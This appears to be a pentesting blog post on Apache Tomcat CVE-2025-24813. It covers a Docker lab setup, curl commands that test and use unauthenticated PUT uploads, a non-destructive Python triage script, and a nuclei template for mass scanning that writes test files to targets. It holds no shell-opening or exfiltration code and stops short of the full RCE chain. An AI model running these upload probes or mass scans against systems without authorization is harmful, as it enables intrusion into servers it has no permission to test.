Introduction:
Apache Tomcat servers running vulnerable versions are currently exposed to a critical unauthenticated remote code execution (RCE) vulnerability – CVE-2025-24813. This flaw is caused by the PUT method being enabled by default, which allows an attacker to upload arbitrary files to the server. If exploited properly, this can lead to remote code execution.
Here’s a quick look at the affected versions:
- Apache Tomcat 11.0.0-M1 to 11.0.2
- Apache Tomcat 10.1.0-M1 to 10.1.34
- Apache Tomcat 9.0.0.M1 to 9.0.98
CVE-2025-24813 – Manual Exploitation
Before jumping into mass scanning and hunting, it’s important to understand the manual exploitation process. Knowing how the vulnerability works under the hood helps avoid false positives and also opens doors to bypass techniques.
We’ll be using a safe testing environment created by AlperenY-cs. It’s Docker-based, so make sure Docker is installed on your machine before continuing.
Clone the repository with the commands below:
git clone https://github.com/AlperenY-cs/CVE-2025-24813.git
cd CVE-2025-24813
Run the following commands to build and start the vulnerable Apache Tomcat container:
docker build -t v-tomcat .
docker run -d -p 1234:8080 --name tomcat-lab v-tomcat
If the ROOT folder was not created, create it manually:
docker exec -it tomcat-lab mkdir -p /usr/local/tomcat/webapps/ROOT
Then confirm that the container is up and responding before going further.
To check whether the PUT method is allowed, send an OPTIONS request as shown below and look for PUT in the Allow header of the response.
curl -X OPTIONS -i http://localhost:1234

Try uploading a file using the PUT method:
curl -X PUT -H "Content-Type: application/octet-stream" --data-binary "poc -pentestguy" http://localhost:1234/poc

Verify the upload: if the response contains your custom text, the upload was successful.
curl -X GET http://localhost:1234/poc
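
As an added example that is not code from the original post, the Python helper below does the non-destructive part of the check above: it reads the Allow header of an OPTIONS response for PUT and compares a known Tomcat version against the affected ranges listed in the introduction, without uploading anything. The sample headers at the bottom are constructed, not captured, and the lab URL and version are assumptions.

```python
"""Non-destructive triage helpers for CVE-2025-24813 (added example, not code from the original post)."""
import re
import urllib.request
from urllib.error import HTTPError
# Affected ranges copied from the post's version list: branch -> (first affected, last affected).
AFFECTED = {
    (9, 0): ((9, 0, 0), (9, 0, 98)),
    (10, 1): ((10, 1, 0), (10, 1, 34)),
    (11, 0): ((11, 0, 0), (11, 0, 2)),
}
_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.-]M\d+)?$")  # also accepts 9.0.0.M1 and 10.1.0-M1

def parse_version(text):
    """Return (major, minor, patch) from '9.0.98', '9.0.0.M1' or '11.0.0-M1'; None if unparseable."""
    m = _VER.match(text.strip())
    return tuple(int(x) for x in m.groups()) if m else None

def is_affected_version(text):
    """True when the version lies inside one of the affected ranges listed in the post."""
    v = parse_version(text)
    if v is None:
        return False
    rng = AFFECTED.get(v[:2])
    return rng is not None and rng[0] <= v <= rng[1]

def allows_put(headers):
    """True when the Allow header of an OPTIONS response lists PUT as a method token (name case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "allow":
            return "PUT" in {tok.strip().upper() for tok in value.split(",")}
    return False

def triage(headers, version=None):
    """Combine both signals: exposed only if PUT is advertised and the version is not known to be fixed."""
    put = allows_put(headers)
    affected = is_affected_version(version) if version else None  # None = version unknown
    return {"put_allowed": put, "affected_version": affected, "likely_exposed": put and affected is not False}

def fetch_options_headers(url, timeout=5):
    """Send a single OPTIONS request (nothing is uploaded) and return the response headers as a dict."""
    req = urllib.request.Request(url, method="OPTIONS")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return dict(resp.headers.items())
    except HTTPError as err:  # a 4xx/5xx reply still carries its headers
        return dict(err.headers.items())

if __name__ == "__main__":
    # Constructed sample, shaped like the lab's OPTIONS reply (not a captured response)
    sample = {"Allow": "GET, HEAD, POST, PUT, DELETE, OPTIONS", "Content-Length": "0"}
    print(triage(sample, version="9.0.98"))
```

Against the lab, `fetch_options_headers("http://localhost:1234/")` supplies the headers for `triage`; the version still has to come from your own inventory, since Tomcat does not advertise it in the OPTIONS reply.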

Mass hunting – CVE-2025-24813
Once you’re confident with manual testing, scale up with mass hunting. Start by gathering subdomains using tools like assetfinder, amass, or subfinder. If you’re unsure where to start, I’ve covered it in detail in my blog post Subdomain enumeration – a complete guide. Then use the nuclei template below for automated detection.
id: CVE-2025-24813

info:
  name: Apache Tomcat Partial PUT Remote Code Execution
  author: pentestguy
  severity: critical
  description: |
    Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34, and 11.0.0-M1 to 11.0.2
    are vulnerable to remote code execution via the partial PUT feature under specific conditions.
  reference:
    - https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/
    - https://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/
  remediation: |
    Upgrade to Apache Tomcat versions 9.0.99, 10.1.35, 11.0.3, or later. If upgrading is not possible,
    disable the partial PUT feature and ensure the default servlet does not have write permissions enabled.

requests:
  - method: OPTIONS
    path:
      - "{{BaseURL}}/"
    matchers:
      - type: regex
        part: header
        regex:
          - "Allow:.*PUT.*"

  - method: PUT
    path:
      - "{{BaseURL}}/test.txt"
    body: "This is a test file."
    matchers:
      - type: status
        status:
          - 201
          - 204

  - method: GET
    path:
      - "{{BaseURL}}/test.txt"
    matchers-condition: and   # both the status and the body must match, otherwise any 200 page would count
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "This is a test file."

  - method: DELETE
    path:
      - "{{BaseURL}}/test.txt"
    matchers:
      - type: status
        status:
          - 200
          - 204

Conclusion:
CVE-2025-24813 is being actively exploited in the wild, so it’s definitely a hot target for bug bounty hunters and red teamers. The fact that it doesn’t require authentication and can result in RCE makes it even more critical. If you’re interested in collaborating with me on real-world testing, tool development, or writing together, feel free to reach out via the Collaboration page. Thank you!!